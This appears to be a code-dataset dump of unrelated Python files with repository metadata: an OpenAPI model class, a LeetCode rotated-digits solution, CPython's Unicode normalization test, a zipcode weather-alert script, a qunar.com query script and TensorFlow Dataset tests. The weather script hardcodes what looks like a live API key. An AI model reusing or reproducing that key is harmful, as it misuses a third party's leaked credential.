                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.standard_symbol = standard_symbol
        for var_name, var_value in kwargs.items():
            if var_name not in self.attribute_map and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        self.additional_properties_type is None:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
        return self
    # Internal attributes that must always exist on an instance.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
    ])
    @convert_js_args_to_python_args
    def __init__(self, standard_symbol, *args, **kwargs):  # noqa: E501
        """StandardSymbolDto - a model defined in OpenAPI
        Args:
            standard_symbol (str):
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.standard_symbol = standard_symbol
        for var_name, var_value in kwargs.items():
            if var_name not in self.attribute_map and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        self.additional_properties_type is None:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
            # Unlike _from_openapi_data, user-side construction rejects
            # read-only attributes.
            if var_name in self.read_only_vars:
                raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
                                     f"class with read only attributes.")
| 42.621094
| 121
| 0.570983
|
4a0f1baf4760e8af92bee70d9df29bc85e4a16a6
| 2,790
|
py
|
Python
|
Python/rotated-digits.py
|
ShuaiWangGit/LeetCode
|
d85a4cb23f8f85059691994e7ad89001c6e4f3f6
|
[
"MIT"
] | 4
|
2019-08-06T01:55:23.000Z
|
2021-12-12T21:04:01.000Z
|
Python/rotated-digits.py
|
ShuaiWangGit/LeetCode
|
d85a4cb23f8f85059691994e7ad89001c6e4f3f6
|
[
"MIT"
] | null | null | null |
Python/rotated-digits.py
|
ShuaiWangGit/LeetCode
|
d85a4cb23f8f85059691994e7ad89001c6e4f3f6
|
[
"MIT"
] | 8
|
2020-02-20T08:21:12.000Z
|
2022-02-17T05:53:21.000Z
|
# Time: O(logn)
# Space: O(logn)
# X is a good number if after rotating each digit individually by 180 degrees,
# we get a valid number that is different from X.
# A number is valid if each digit remains a digit after rotation.
# 0, 1, and 8 rotate to themselves; 2 and 5 rotate to each other;
# 6 and 9 rotate to each other, and the rest of the numbers do not rotate to any other number.
#
# Now given a positive number N, how many numbers X from 1 to N are good?
#
# Example:
# Input: 10
# Output: 4
# Explanation:
# There are four good numbers in the range [1, 10] : 2, 5, 6, 9.
# Note that 1 and 10 are not good numbers, since they remain unchanged after rotating.
#
# Note:
# - N will be in range [1, 10000].
# memoization (top-down dp)
class Solution(object):
    def rotatedDigits(self, N):
        """
        :type N: int
        :rtype: int

        Count "good" numbers in [1, N]: numbers containing no 3/4/7 and
        at least one digit that changes under a 180-degree rotation
        (2/5/6/9).  Digit DP over str(N), memoized on
        (position, prefix-still-equal-to-N, seen-a-changing-digit).

        Fixed for Python 2/3 compatibility: the original used a bare
        ``map`` (lazy on Python 3, so ``len(A)`` failed) and ``xrange``.
        """
        digits = [int(c) for c in str(N)]
        invalid, diff = set([3, 4, 7]), set([2, 5, 6, 9])

        def dp(i, is_prefix_equal, is_good, lookup):
            # Base case: a complete number; count it iff some digit rotated.
            if i == len(digits):
                return int(is_good)
            key = (i, is_prefix_equal, is_good)
            if key not in lookup:
                result = 0
                # While still equal to N's prefix, the next digit is capped.
                upper = digits[i] + 1 if is_prefix_equal else 10
                for d in range(upper):
                    if d in invalid:
                        continue
                    result += dp(i + 1,
                                 is_prefix_equal and d == digits[i],
                                 is_good or d in diff,
                                 lookup)
                lookup[key] = result
            return lookup[key]

        return dp(0, True, False, {})
# Time: O(n)
# Space: O(n)
class Solution2(object):
    def rotatedDigits(self, N):
        """
        :type N: int
        :rtype: int

        Bottom-up DP: dp[i] records whether i is made only of rotatable
        digits (SAME/DIFF) or contains an invalid digit (INVALID); every
        valid prefix i is extended by one digit to i*10+j.

        Fixed for Python 2/3 compatibility: ``range`` instead of
        Python-2-only ``xrange`` (on Python 2 this is equivalent here).
        """
        INVALID, SAME, DIFF = 0, 1, 2
        same, diff = [0, 1, 8], [2, 5, 6, 9]
        dp = [0] * (N + 1)
        dp[0] = SAME
        for i in range(N // 10 + 1):
            if dp[i] != INVALID:
                # Appending a self-rotating digit keeps the prefix's status.
                for j in same:
                    if i * 10 + j <= N:
                        dp[i * 10 + j] = max(SAME, dp[i])
                # Appending a changing digit makes the number good.
                for j in diff:
                    if i * 10 + j <= N:
                        dp[i * 10 + j] = DIFF
        return dp.count(DIFF)
# Time: O(nlogn) = O(n), because O(logn) = O(32) by this input
# Space: O(logn) = O(1)
class Solution3(object):
    def rotatedDigits(self, N):
        """
        :type N: int
        :rtype: int

        Brute force: i is good iff its decimal digits contain no 3/4/7
        and at least one of 2/5/6/9.

        Fixed for Python 2/3 compatibility: ``range`` instead of
        Python-2-only ``xrange``; also dropped the redundant
        ``set(list(...))`` wrapper.
        """
        invalid, diff = set('347'), set('2569')
        result = 0
        for i in range(N + 1):
            digit_set = set(str(i))
            if invalid & digit_set:
                continue
            if diff & digit_set:
                result += 1
        return result
| 31.348315
| 94
| 0.491756
|
4a0f1c50055fa8812453d8fc05f485d8c7513f88
| 3,134
|
py
|
Python
|
Lib/test/test_normalization.py
|
legacy-buildtools/python-2.6.7
|
3be140725590f1a43f7ab8c9fd99f876c3f81536
|
[
"PSF-2.0"
] | 1
|
2015-01-05T10:24:11.000Z
|
2015-01-05T10:24:11.000Z
|
Lib/test/test_normalization.py
|
legacy-buildtools/python-2.6.7
|
3be140725590f1a43f7ab8c9fd99f876c3f81536
|
[
"PSF-2.0"
] | null | null | null |
Lib/test/test_normalization.py
|
legacy-buildtools/python-2.6.7
|
3be140725590f1a43f7ab8c9fd99f876c3f81536
|
[
"PSF-2.0"
] | null | null | null |
from test.test_support import run_unittest, open_urlresource, TestSkipped
import unittest
import sys
import os
from unicodedata import normalize, unidata_version
TESTDATAFILE = "NormalizationTest" + os.extsep + "txt"
TESTDATAURL = "http://www.unicode.org/Public/" + unidata_version + "/ucd/" + TESTDATAFILE
# Drop a previously downloaded data file if it was generated for a
# different Unicode version than the one this unicodedata was built with
# (the version string appears in the file's first line).
if os.path.exists(TESTDATAFILE):
    f = open(TESTDATAFILE)
    l = f.readline()
    f.close()
    if not unidata_version in l:
        os.unlink(TESTDATAFILE)
class RangeError(Exception):
    """Raised by unistr() when a code point exceeds sys.maxunicode."""
    pass
def NFC(str):
    """Shorthand: normalize *str* to form NFC."""
    return normalize("NFC", str)
def NFKC(str):
    """Shorthand: normalize *str* to form NFKC."""
    return normalize("NFKC", str)
def NFD(str):
    """Shorthand: normalize *str* to form NFD."""
    return normalize("NFD", str)
def NFKD(str):
    """Shorthand: normalize *str* to form NFKD."""
    return normalize("NFKD", str)
def unistr(data):
    """Convert a space-separated string of hex code points to unicode.

    Raises RangeError if any code point is above sys.maxunicode (e.g. on
    narrow builds).
    """
    codepoints = [int(token, 16) for token in data.split(" ")]
    for cp in codepoints:
        if cp > sys.maxunicode:
            raise RangeError
    return u"".join([unichr(cp) for cp in codepoints])
class NormalizationTest(unittest.TestCase):
    def test_main(self):
        # First-column characters seen in Part1, so the exhaustive sweep
        # below can skip characters already exercised by the data file.
        part1_data = {}
        for line in open_urlresource(TESTDATAURL):
            if '#' in line:
                line = line.split('#')[0]
            line = line.strip()
            if not line:
                continue
            # "@PartN" header lines mark sections of the data file.
            # NOTE(review): `part` is unbound if a data line precedes the
            # first @Part header — the file format guarantees one, but a
            # malformed download would raise NameError here.
            if line.startswith("@Part"):
                part = line.split()[0]
                continue
            # Each data line has five semicolon-separated code point
            # sequences: source; NFC; NFD; NFKC; NFKD.
            try:
                c1,c2,c3,c4,c5 = [unistr(x) for x in line.split(';')[:-1]]
            except RangeError:
                # Skip unsupported characters;
                # try at least adding c1 if we are in part1
                if part == "@Part1":
                    try:
                        c1 = unistr(line.split(';')[0])
                    except RangeError:
                        pass
                    else:
                        part1_data[c1] = 1
                continue
            # Perform tests: the conformance invariants stated in the
            # NormalizationTest.txt header.
            self.failUnless(c2 == NFC(c1) == NFC(c2) == NFC(c3), line)
            self.failUnless(c4 == NFC(c4) == NFC(c5), line)
            self.failUnless(c3 == NFD(c1) == NFD(c2) == NFD(c3), line)
            self.failUnless(c5 == NFD(c4) == NFD(c5), line)
            self.failUnless(c4 == NFKC(c1) == NFKC(c2) == \
                            NFKC(c3) == NFKC(c4) == NFKC(c5),
                            line)
            self.failUnless(c5 == NFKD(c1) == NFKD(c2) == \
                            NFKD(c3) == NFKD(c4) == NFKD(c5),
                            line)
            # Record part 1 data
            if part == "@Part1":
                part1_data[c1] = 1
        # Perform tests for all other data: every character not listed in
        # Part1 must be invariant under all four normalization forms.
        for c in range(sys.maxunicode+1):
            X = unichr(c)
            if X in part1_data:
                continue
            self.failUnless(X == NFC(X) == NFD(X) == NFKC(X) == NFKD(X), c)
    def test_bug_834676(self):
        # Check for bug 834676: normalizing this Hangul pair used to crash.
        normalize('NFC', u'\ud55c\uae00')
def test_main():
    """Run the suite, skipping it when the test data cannot be fetched."""
    # Hit the exception early
    try:
        open_urlresource(TESTDATAURL)
    except IOError:
        raise TestSkipped("could not retrieve " + TESTDATAURL)
    run_unittest(NormalizationTest)
if __name__ == "__main__":
    test_main()
| 30.134615
| 89
| 0.516911
|
4a0f1c9308edf9393351d385c4e0bfaabc3bf707
| 690
|
py
|
Python
|
location.py
|
scastillosanchez/HACKRPI
|
ece78dc821f65c2d7d85d695a6de3aa3ab60634d
|
[
"MIT"
] | null | null | null |
location.py
|
scastillosanchez/HACKRPI
|
ece78dc821f65c2d7d85d695a6de3aa3ab60634d
|
[
"MIT"
] | null | null | null |
location.py
|
scastillosanchez/HACKRPI
|
ece78dc821f65c2d7d85d695a6de3aa3ab60634d
|
[
"MIT"
] | null | null | null |
# location.py
import json

import requests
from uszipcode import SearchEngine
API_KEY = 'dc5ea0e10f11465f9ea0e10f11e65fa6'
def get_location_coords(zipcode):
    """Look up a US zipcode and return its [latitude, longitude] pair.

    Returns the coordinates as strings so callers can join them with a
    comma (see get_weather_alert).

    Bug fix: SimpleZipcode.to_json() returns a JSON *string*; the
    original code indexed that string with ["lat"], which raises
    TypeError.  Parse the JSON first.
    """
    search = SearchEngine(simple_zipcode=True)
    result = search.by_zipcode(zipcode)
    data = json.loads(result.to_json())
    # NOTE(review): uszipcode documents the longitude field as "lng"; the
    # original read "long".  Fall back between the two — confirm against
    # the installed uszipcode version.
    longitude = data.get("lng", data.get("long"))
    return [str(data["lat"]), str(longitude)]
def get_weather_alert(zipcode):
    """Fetch weather.com alert headlines near *zipcode* as decoded JSON.

    Bug fix: the original built the geocode with string concatenation
    (`location[0] + ',' + location[1]`), which raises TypeError when the
    coordinates are numeric.  Formatting tolerates both.
    """
    location = get_location_coords(zipcode)
    coordinates = '{},{}'.format(location[0], location[1])
    alert_url = 'https://api.weather.com/v3/alerts/headlines'
    # NOTE(review): API_KEY is defined at module level but never sent;
    # the v3 alerts endpoint normally requires an apiKey parameter —
    # confirm whether it should be added to `params`.
    params = {'geocode': coordinates, 'format': 'json', 'Accept-Encoding': 'gzip'}
    weather_response = requests.get(alert_url, params=params).json()
    return weather_response
| 26.538462
| 82
| 0.715942
|
4a0f1db93709b87eae9b770087528fa84e5bd811
| 595
|
py
|
Python
|
myfirstpjt.py
|
helloworldtang/python-spider-study
|
b65bc646e716bd3cd421aa9c395507fded7aff06
|
[
"Apache-2.0"
] | null | null | null |
myfirstpjt.py
|
helloworldtang/python-spider-study
|
b65bc646e716bd3cd421aa9c395507fded7aff06
|
[
"Apache-2.0"
] | null | null | null |
myfirstpjt.py
|
helloworldtang/python-spider-study
|
b65bc646e716bd3cd421aa9c395507fded7aff06
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'tangcheng'
__mtime__ = '12/12/2017'
"""
from urllib import request
from urllib import parse
from urllib.request import urlopen
# http://dujia.qunar.com/pq/list_%E5%AE%9C%E6%98%8C?
# searchfrom=around&arounddep=%E6%AD%A6%E6%B1%89&tf=Ihot_01
# Build the query string for the "around Wuhan" package-tour listing.
data = {}
data['searchfrom'] = 'around'
# Bug fix: store the raw value and let urlencode() percent-encode it.
# The original stored the already-encoded '%E6%AD%A6%E6%B1%89' ("武汉"),
# which urlencode would double-encode ('%' -> '%25'), producing a wrong
# query string.
data['arounddep'] = '武汉'
data['tf'] = 'Ihot_01'
value = parse.urlencode(data)
print(value)
# The path segment is kept pre-encoded ("宜昌"); only the query is built here.
url = 'http://dujia.qunar.com/pq/list_%E5%AE%9C%E6%98%8C' + '?' + value
response = urlopen(url)
print(response.read())
| 18.59375
| 71
| 0.672269
|
4a0f1f46974f276982ee76b99d4bc0f29eb6b8cb
| 25,882
|
py
|
Python
|
tensorflow/python/data/kernel_tests/dataset_test.py
|
mkuchnik/TF_PCR
|
c3cc6a9bad115925cd398d01cedd85af68aa1be2
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/data/kernel_tests/dataset_test.py
|
mkuchnik/TF_PCR
|
c3cc6a9bad115925cd398d01cedd85af68aa1be2
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/data/kernel_tests/dataset_test.py
|
mkuchnik/TF_PCR
|
c3cc6a9bad115925cd398d01cedd85af68aa1be2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import graph_pb2
from tensorflow.python.data.experimental.ops import distribute_options
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import optional_ops
from tensorflow.python.data.ops import readers
from tensorflow.python.data.util import nest
from tensorflow.python.data.util import structure
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
class DatasetTest(test_base.DatasetTestBase, parameterized.TestCase):
  @combinations.generate(test_base.default_test_combinations())
  def testAsSerializedGraph(self):
    # The serialized graph of a range dataset must contain a RangeDataset op.
    dataset = dataset_ops.Dataset.range(10)
    graph = graph_pb2.GraphDef().FromString(
        self.evaluate(dataset._as_serialized_graph()))
    self.assertTrue(any(node.op == "RangeDataset" for node in graph.node))
  def testAsSerializedGraphStateful(self):
    # Serializing a dataset containing stateful ops (random_uniform) must
    # fail under ExternalStatePolicy.FAIL.
    dataset = dataset_ops.Dataset.range(10).map(
        lambda _: random_ops.random_uniform(()))
    with self.assertRaises(errors.FailedPreconditionError):
      self.evaluate(
          dataset._as_serialized_graph(external_state_policy=distribute_options
                                       .ExternalStatePolicy.FAIL))
  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         combinations.combine(init_from_file=[True, False])))
  def testLookupTableGraphSerialization(self, init_from_file):
    # A dataset capturing a lookup table (file- or tensor-initialized) must
    # survive a round trip through graph serialization, even after the
    # original table and dataset objects are dropped.
    if init_from_file:
      file = os.path.join(self.get_temp_dir(), "lookup_table_graph_serialize")
      with open(file, "w") as f:
        f.write("10\n11\n")
      initializer = lookup_ops.TextFileInitializer(
          file, dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER,
          dtypes.int64, lookup_ops.TextFileIndex.WHOLE_LINE)
    else:
      keys_tensor = constant_op.constant([0, 1], dtype=dtypes.int64)
      vals_tensor = constant_op.constant([10, 11])
      initializer = lookup_ops.KeyValueTensorInitializer(
          keys_tensor, vals_tensor)
    table = lookup_ops.StaticHashTable(initializer, -1)
    dataset = dataset_ops.Dataset.range(3)
    dataset = dataset.map(table.lookup)
    self.evaluate(lookup_ops.tables_initializer())
    round_tripped = self.graphRoundTrip(dataset)
    # Drop the originals to prove the round-tripped graph is self-contained.
    del table
    del dataset
    self.assertDatasetProduces(
        round_tripped, [10, 11, -1], requires_initialization=True)
  @combinations.generate(test_base.default_test_combinations())
  def testAsFunctionWithMap(self):
    # _trace_variant_creation() produces a function whose variant output can
    # be rewrapped as a dataset that yields the same elements.
    if not context.executing_eagerly():
      self.skipTest("Only works executing eagerly")
    with ops.device("CPU"):
      original_dataset = dataset_ops.Dataset.range(5).map(lambda x: x * 2)
      fn = original_dataset._trace_variant_creation()
      variant = fn()
      revived_dataset = dataset_ops._VariantDataset(
          variant, original_dataset.element_spec)
      self.assertDatasetProduces(revived_dataset, range(0, 10, 2))
  @combinations.generate(test_base.default_test_combinations())
  def testAsFunctionWithMapInFlatMap(self):
    # Same round trip, with a nested map inside flat_map.
    if not context.executing_eagerly():
      self.skipTest("Only works executing eagerly")
    with ops.device("CPU"):
      original_dataset = dataset_ops.Dataset.range(5).flat_map(
          lambda x: dataset_ops.Dataset.range(5).map(lambda x: x * 2))
      fn = original_dataset._trace_variant_creation()
      variant = fn()
      revived_dataset = dataset_ops._VariantDataset(
          variant, original_dataset.element_spec)
      self.assertDatasetProduces(revived_dataset, list(original_dataset))
  def _testNumInputs(self, dataset, num_inputs):
    """Assert that `dataset._inputs()` reports exactly `num_inputs` inputs."""
    self.assertLen(dataset._inputs(), num_inputs)
  @combinations.generate(test_base.default_test_combinations())
  def testFixedLengthRecordInputs(self):
    dataset = readers.FixedLengthRecordDataset("", 42)
    self._testNumInputs(dataset, 0)
  @combinations.generate(test_base.default_test_combinations())
  def testFromGeneratorInputs(self):
    def gen():
      yield 42
    dataset = dataset_ops.Dataset.from_generator(gen, dtypes.int32)
    self._testNumInputs(dataset, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testFromTensorsInputs(self):
    dataset = dataset_ops.Dataset.from_tensors([42])
    self._testNumInputs(dataset, 0)
  @combinations.generate(test_base.default_test_combinations())
  def testRangeInputs(self):
    dataset = dataset_ops.Dataset.range(10)
    self._testNumInputs(dataset, 0)
  @combinations.generate(test_base.default_test_combinations())
  def testTextLineInputs(self):
    dataset = readers.TextLineDataset("")
    self._testNumInputs(dataset, 0)
  @combinations.generate(test_base.default_test_combinations())
  def testTFRecordInputs(self):
    dataset = readers.TFRecordDataset("")
    self._testNumInputs(dataset, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testProgressiveCompressedRecordInputs(self):
    dataset = readers.ProgressiveCompressedRecordDataset("")
    self._testNumInputs(dataset, 1)
  @combinations.generate(
      combinations.combine(tf_api_version=1, mode=["eager", "graph"]))
  def testDatasetComplexSourceInputs(self):
    # from_sparse_tensor_slices is a source: it reports no input datasets.
    dataset_fn = dataset_ops.Dataset.from_sparse_tensor_slices(
        sparse_tensor.SparseTensor(
            indices=np.array([[0, 0], [1, 0], [2, 0]]),
            values=np.array([0, 0, 0]),
            dense_shape=np.array([3, 1])))
    self.assertEmpty(dataset_fn._inputs())
  def _testUnaryInputs(self, dataset_fn):
    """Assert a unary transformation reports its single input dataset."""
    input_dataset = dataset_ops.Dataset.range(0)
    self.assertEqual([input_dataset], dataset_fn(input_dataset)._inputs())
  @combinations.generate(test_base.default_test_combinations())
  def testBatchInputs(self):
    self._testUnaryInputs(lambda x: x.batch(10))
  @combinations.generate(test_base.default_test_combinations())
  def testCacheInputs(self):
    self._testUnaryInputs(lambda x: x.cache())
  @combinations.generate(test_base.default_test_combinations())
  def testFilterInputs(self):
    self._testUnaryInputs(lambda x: x.filter(lambda x: True))
  @combinations.generate(test_base.default_test_combinations())
  def testFlatMapInputs(self):
    self._testUnaryInputs(
        lambda x: x.flat_map(lambda x: dataset_ops.Dataset.range(0)))
  @combinations.generate(test_base.default_test_combinations())
  def testMapInputs(self):
    self._testUnaryInputs(lambda x: x.map(lambda x: x))
  @combinations.generate(test_base.default_test_combinations())
  def testPaddedBatchInputs(self):
    self._testUnaryInputs(lambda x: x.padded_batch(10, []))
  @combinations.generate(test_base.default_test_combinations())
  def testParallelMapInputs(self):
    self._testUnaryInputs(lambda x: x.map(lambda x: x, num_parallel_calls=2))
  @combinations.generate(test_base.default_test_combinations())
  def testRepeatInputs(self):
    self._testUnaryInputs(lambda x: x.repeat())
  @combinations.generate(test_base.default_test_combinations())
  def testShuffleInputs(self):
    self._testUnaryInputs(lambda x: x.shuffle(10))
  @combinations.generate(test_base.default_test_combinations())
  def testSkipInputs(self):
    self._testUnaryInputs(lambda x: x.skip(1))
  @combinations.generate(test_base.default_test_combinations())
  def testTakeInputs(self):
    self._testUnaryInputs(lambda x: x.take(1))
  @combinations.generate(test_base.default_test_combinations())
  def testWindowInputs(self):
    self._testUnaryInputs(lambda x: x.window(10))
  @combinations.generate(test_base.default_test_combinations())
  def testUnaryTransformationInputsApply(self):
    # apply() must not hide the underlying input dataset.
    input_dataset = dataset_ops.Dataset.range(0)
    dataset = input_dataset.apply(lambda dataset: dataset.cache())
    self.assertEqual([input_dataset], dataset._inputs())
  def _testInputsWithInterleaveFn(self, dataset_fn, interleave_parallelism):
    """Assert interleave reports its input dataset.

    NOTE(review): the `dataset_fn` parameter is accepted but never used —
    the interleave map function is hard-coded below. Confirm intent.
    """
    input_dataset = dataset_ops.Dataset.range(0)
    dataset = input_dataset.interleave(
        lambda x: dataset_ops.Dataset.range(0),
        cycle_length=2,
        num_parallel_calls=interleave_parallelism)
    self.assertEqual([input_dataset], dataset._inputs())
  @combinations.generate(test_base.default_test_combinations())
  def testParallelInterleaveInputs(self):
    self._testInputsWithInterleaveFn(lambda: dataset_ops.range(0), 2)
  @combinations.generate(test_base.default_test_combinations())
  def testInterleaveInputs(self):
    self._testInputsWithInterleaveFn(lambda: dataset_ops.range(0), None)
  @combinations.generate(test_base.default_test_combinations())
  def testNoWarnings(self):
    # Building an interleave must not emit any warnings.
    with test.mock.patch.object(warnings, "warn") as mock_log:
      dataset_ops.Dataset.range(0).interleave(
          lambda x: dataset_ops.Dataset.range(0), cycle_length=2)
      self.assertEmpty(mock_log.call_args_list)
  def _testBinaryInputs(self, dataset_fn):
    """Assert a binary transformation reports both input datasets in order."""
    input1 = dataset_ops.Dataset.range(0)
    input2 = dataset_ops.Dataset.range(1)
    self.assertEqual([input1, input2], dataset_fn(input1, input2)._inputs())
  @combinations.generate(test_base.default_test_combinations())
  def testConcatenateInputs(self):
    self._testBinaryInputs(lambda x, y: x.concatenate(y))
  def _testVariadicInputs(self, dataset_fn, input_datasets):
    """Assert a variadic transformation reports its flattened inputs."""
    self.assertEqual(
        nest.flatten(input_datasets),
        dataset_fn(input_datasets)._inputs())
  @combinations.generate(test_base.default_test_combinations())
  def testZipOneInputs(self):
    input_datasets = dataset_ops.Dataset.range(0)
    self._testVariadicInputs(dataset_ops.Dataset.zip, input_datasets)
  @combinations.generate(test_base.default_test_combinations())
  def testZipNestInputs(self):
    input_datasets = (dataset_ops.Dataset.range(0),
                      (dataset_ops.Dataset.range(1),
                       dataset_ops.Dataset.range(2)))
    self._testVariadicInputs(dataset_ops.Dataset.zip, input_datasets)
  @combinations.generate(test_base.default_test_combinations())
  def testZipTupleInputs(self):
    input_datasets = (dataset_ops.Dataset.range(0),
                      dataset_ops.Dataset.range(1))
    self._testVariadicInputs(dataset_ops.Dataset.zip, input_datasets)
  @combinations.generate(test_base.default_test_combinations())
  def testFunctions(self):
    # A mapped dataset exposes exactly one captured function.
    dataset = dataset_ops.Dataset.range(5).map(lambda x: x * 2)
    self.assertLen(dataset._functions(), 1)
  @combinations.generate(test_base.default_test_combinations())
  def testCollectInputs(self):
    # Breadth-first walk of the input graph; shared inputs are visited once
    # per edge, so the multiset counts reflect how often each dataset is
    # referenced: ds1 via ds2 (twice, twice) and ds3 directly (once).
    ds1 = dataset_ops.Dataset.range(0)
    ds2 = ds1.concatenate(ds1)
    ds3 = dataset_ops.Dataset.zip((ds2, ds1, ds2))
    inputs = []
    queue = [ds3]
    while queue:
      ds = queue[0]
      queue = queue[1:]
      queue.extend(ds._inputs())
      inputs.append(ds)
    self.assertEqual(5, inputs.count(ds1))
    self.assertEqual(2, inputs.count(ds2))
    self.assertEqual(1, inputs.count(ds3))
  def _testDatasetSpec(self, tf_value, expected_element_structure):
    # Helper: a dataset whose elements are `tf_value` must (a) advertise the
    # expected element structure, (b) flatten to one scalar variant tensor,
    # and (c) survive a round trip through the tensor-list conversion APIs.
    dataset = dataset_ops.Dataset.from_tensors(0).map(lambda _: tf_value)
    dataset_structure = structure.type_spec_from_value(dataset)
    self.assertIsInstance(dataset_structure, dataset_ops.DatasetSpec)

    self.assertTrue(
        structure.are_compatible(
            dataset_ops.get_structure(dataset), expected_element_structure))
    self.assertEqual([dtypes.variant],
                     structure.get_flat_tensor_types(dataset_structure))
    self.assertEqual([tensor_shape.TensorShape([])],
                     structure.get_flat_tensor_shapes(dataset_structure))

    # Assert that the `Dataset` survives a round-trip via _from_tensor_list()
    # and _to_tensor_list().
    round_trip_dataset = dataset_structure._from_tensor_list(
        dataset_structure._to_tensor_list(dataset))

    value = tf_value

    if isinstance(value, dataset_ops.Dataset):
      self.assertDatasetsEqual(value, dataset.flat_map(lambda x: x))
    elif isinstance(value, optional_ops.Optional):
      self.assertDatasetProduces(
          round_trip_dataset.map(lambda opt: opt.get_value()),
          [self.evaluate(value.get_value())],
          requires_initialization=True)
    else:
      self.assertDatasetProduces(
          round_trip_dataset, [self.evaluate(tf_value)],
          requires_initialization=True)

  @combinations.generate(test_base.default_test_combinations())
  def testTensorDatasetSpec(self):
    """Scalar dense tensor elements produce a TensorSpec structure."""
    self._testDatasetSpec(
        constant_op.constant(37.0), tensor_spec.TensorSpec([], dtypes.float32))

  @combinations.generate(test_base.default_test_combinations())
  def testSparseTensorDatasetSpec(self):
    """SparseTensor elements produce a SparseTensorSpec structure."""
    self._testDatasetSpec(
        sparse_tensor.SparseTensor(
            indices=[[0]],
            values=constant_op.constant([0], dtype=dtypes.int32),
            dense_shape=[1]), sparse_tensor.SparseTensorSpec([1], dtypes.int32))

  @combinations.generate(test_base.default_test_combinations())
  def testNestDatasetSpec(self):
    """Nested dict/tuple elements map to the matching nest of TensorSpecs."""
    self._testDatasetSpec(
        {
            "a": constant_op.constant(37.0),
            "b": (constant_op.constant(["Foo"]), constant_op.constant("Bar"))
        }, {
            "a":
                tensor_spec.TensorSpec([], dtypes.float32),
            "b": (
